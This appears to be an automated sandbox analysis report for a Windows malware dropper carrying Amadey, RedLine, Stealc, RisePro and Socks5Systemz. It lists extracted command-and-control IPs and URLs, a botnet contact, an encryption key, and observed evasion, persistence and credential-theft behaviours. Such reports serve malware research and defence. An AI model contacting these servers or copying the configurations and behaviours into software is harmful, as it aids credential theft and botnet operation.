amadey | e05339d69a421e810a5495535f52a3ff1daf6a03c5d24108ee275820a4312aa3

Analysis

max time kernel
231s
max time network
228s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
26-06-2024 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1719422619.8807507_setup.exe
Size

4.3MB
MD5

f5c0640ab25b992acfc6af0a3786a009
SHA1

b6faf5321a61d2f52ee835d7da1a50f451fe9dfa
SHA256

e05339d69a421e810a5495535f52a3ff1daf6a03c5d24108ee275820a4312aa3
SHA512

7c3bcfbf0d1f459d660da79a95ecf07cda45f636659c05e579d4858d89c00dea1dfe937bd79566082dfcbcd9798b8ece5df662a6704c7a684648b138eff90cea
SSDEEP

98304:W+4KsuX9weOTFV1soCftKVZ9gB5wQnb1aH0IEOJL9eFmB:frCFAOLgB59bEEOJLoFA

Malware Config

Extracted

Family

risepro

191.101.209.39

5.42.66.10

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

5.42.65.92:27953

Extracted

Family

stealc

Botnet

default

http://85.28.47.4

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

http://147.45.47.155

Attributes

install_dir
9217037dc9
install_file
explortu.exe
strings_key
8e894a8a4a3d0da8924003a561cfb244
url_paths
/ku4Nor9/index.php

rc4.plain

Extracted

Family

socks5systemz

bdimxvg.com

http://bdimxvg.com/search/?q=67e28dd86f59a17b435afa187c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978a271ea771795af8e05c645db22f31dfe339426fa12a466c553adb719a9577e55b8603e983a608ff615c2ed9d9b3a

http://bdimxvg.com/search/?q=67e28dd86f59a17b435afa187c27d78406abdd88be4b12eab517aa5c96bd86ec958349865a8bbc896c58e713bc90c91a36b5281fc235a925ed3e01d6bd974a95129070b616e96cc92be510b866db51b9e34eed4c2b14a82966836f23d7f210c7ee9c9e39cf679717

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	1719422619.8807507_setup.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/1748-437-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	vihFzk9jCs0pItPYYIi5itTj.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	DAAFBAKECA.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
67	3664	1719422619.8807507_setup.exe
73	3664	1719422619.8807507_setup.exe
130	3704	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2388	powershell.exe
4160	powershell.exe
3704	powershell.exe
3028	powershell.EXE
784	powershell.exe
2900	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x0002000000025c91-119.dat	net_reactor
behavioral2/memory/5000-174-0x0000000000850000-0x0000000000C8C000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DAAFBAKECA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vihFzk9jCs0pItPYYIi5itTj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vihFzk9jCs0pItPYYIi5itTj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DAAFBAKECA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Control Panel\International\Geo\Nation	tThtRPO.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	vihFzk9jCs0pItPYYIi5itTj.exe

Executes dropped EXE 25 IoCs

pid	Process
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
1508	O31cM3L7N729qiMfZ32ZErtb.exe
3912	R6PBXCMSO9TzmAaDyHEOHGAa.exe
2080	XiiRMqxd1DldtkIsBZaBkkPQ.exe
3480	vihFzk9jCs0pItPYYIi5itTj.exe
2956	2aJvrCiUDCFYYXG64hV3mgtw.exe
4412	G4I2nkjHTCezGAMuIbkdUmWe.exe
2904	GBnJo1RZMtXzuVP9XNAij4Im.exe
5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe
4648	XiiRMqxd1DldtkIsBZaBkkPQ.tmp
1600	audionormalizer32_64.exe
1496	Install.exe
824	audionormalizer32_64.exe
4032	Install.exe
3304	DAAFBAKECA.exe
416	explortu.exe
4088	EHJKFCGHID.exe
1820	BKJKJEHJJD.exe
3748	IECAFHDBGH.exe
4968	67b41ac664.exe
996	eqtpkqwqodik.exe
1364	explortu.exe
2424	Install.exe
3372	tThtRPO.exe
1712	explortu.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	DAAFBAKECA.exe
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Wine	explortu.exe

Loads dropped DLL 4 IoCs

pid	Process
4648	XiiRMqxd1DldtkIsBZaBkkPQ.tmp
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
3704	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0002000000025c8a-148.dat	themida
behavioral2/memory/3480-177-0x0000000000870000-0x000000000142A000-memory.dmp	themida
behavioral2/memory/3480-190-0x0000000000870000-0x000000000142A000-memory.dmp	themida
behavioral2/memory/3480-191-0x0000000000870000-0x000000000142A000-memory.dmp	themida
behavioral2/memory/3480-192-0x0000000000870000-0x000000000142A000-memory.dmp	themida
behavioral2/memory/3480-742-0x0000000000870000-0x000000000142A000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	141.98.234.31

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	vihFzk9jCs0pItPYYIi5itTj.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vihFzk9jCs0pItPYYIi5itTj.exe

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	tThtRPO.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	tThtRPO.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ipinfo.io
5	api.myip.com
6	ipinfo.io
11	ipinfo.io
103	ipinfo.io
4	api.myip.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5040	powercfg.exe
3196	powercfg.exe
1748	powercfg.exe
3156	powercfg.exe
4624	powercfg.exe
4440	powercfg.exe
4908	powercfg.exe
2296	powercfg.exe

Drops file in System32 directory 35 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_74182CF0A4AE5ED3D7F44586422BCB36	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	tThtRPO.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	tThtRPO.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_11C7636B4ED451F6A0167B1B5EB1E2C1	tThtRPO.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_377D07FDFD79CC3A0CC83B675B685EDC	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_377D07FDFD79CC3A0CC83B675B685EDC	tThtRPO.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1719422619.8807507_setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	1719422619.8807507_setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	tThtRPO.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_11C7636B4ED451F6A0167B1B5EB1E2C1	tThtRPO.exe
File opened for modification	C:\Windows\System32\GroupPolicy	1719422619.8807507_setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_74182CF0A4AE5ED3D7F44586422BCB36	tThtRPO.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1719422619.8807507_setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	tThtRPO.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
3480	vihFzk9jCs0pItPYYIi5itTj.exe
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
344	r_qUrVNOihb6Qjyj3i4KaR31.exe
3304	DAAFBAKECA.exe
416	explortu.exe
4968	67b41ac664.exe
1364	explortu.exe
1712	explortu.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 5000 set thread context of 1636	5000	cLDYFdAxp1MLwPYZWc_Q4T3A.exe	94
PID 4412 set thread context of 1748	4412	G4I2nkjHTCezGAMuIbkdUmWe.exe	178
PID 1508 set thread context of 3476	1508	O31cM3L7N729qiMfZ32ZErtb.exe	97
PID 4088 set thread context of 788	4088	EHJKFCGHID.exe	171
PID 1820 set thread context of 3884	1820	BKJKJEHJJD.exe	151
PID 3748 set thread context of 364	3748	IECAFHDBGH.exe	155
PID 3912 set thread context of 1384	3912	R6PBXCMSO9TzmAaDyHEOHGAa.exe	177
PID 996 set thread context of 4968	996	eqtpkqwqodik.exe	182
PID 996 set thread context of 4448	996	eqtpkqwqodik.exe	184

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\RgdiTWAdU\BlbSzM.dll	tThtRPO.exe
File created	C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\NWBKGdV.xml	tThtRPO.exe
File created	C:\Program Files (x86)\wGxkUGMqSkfBC\GXhGnlB.dll	tThtRPO.exe
File created	C:\Program Files (x86)\LUWSYkNLogUn\gVJiGPN.dll	tThtRPO.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	tThtRPO.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	tThtRPO.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	tThtRPO.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	tThtRPO.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	tThtRPO.exe
File created	C:\Program Files (x86)\dLLzADClkagU2\IUTyuXa.xml	tThtRPO.exe
File created	C:\Program Files (x86)\wGxkUGMqSkfBC\WvUCCld.xml	tThtRPO.exe
File created	C:\Program Files (x86)\RgdiTWAdU\UMKANxN.xml	tThtRPO.exe
File created	C:\Program Files (x86)\dLLzADClkagU2\gBFlLbeSSzwML.dll	tThtRPO.exe
File created	C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\AeumrFi.dll	tThtRPO.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explortu.job	DAAFBAKECA.exe
File created	C:\Windows\Tasks\bjeWJKrHnPpdAGCduF.job	schtasks.exe
File created	C:\Windows\Tasks\zjtCPqTOixnxYITTP.job	schtasks.exe
File created	C:\Windows\Tasks\gwLAkOfFqvEnRPY.job	schtasks.exe
File created	C:\Windows\Tasks\mFeioppqsVnzBGRpZ.job	schtasks.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5000	sc.exe
4164	sc.exe
884	sc.exe
1592	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
1788	4088	WerFault.exe	138
1384	4088	WerFault.exe	138
4064	1820	WerFault.exe	149
236	3748	WerFault.exe	154
1848	2424	WerFault.exe	192
2172	4032	WerFault.exe	102
3412	3372	WerFault.exe	282

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	r_qUrVNOihb6Qjyj3i4KaR31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	r_qUrVNOihb6Qjyj3i4KaR31.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1604	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	tThtRPO.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	tThtRPO.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	tThtRPO.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
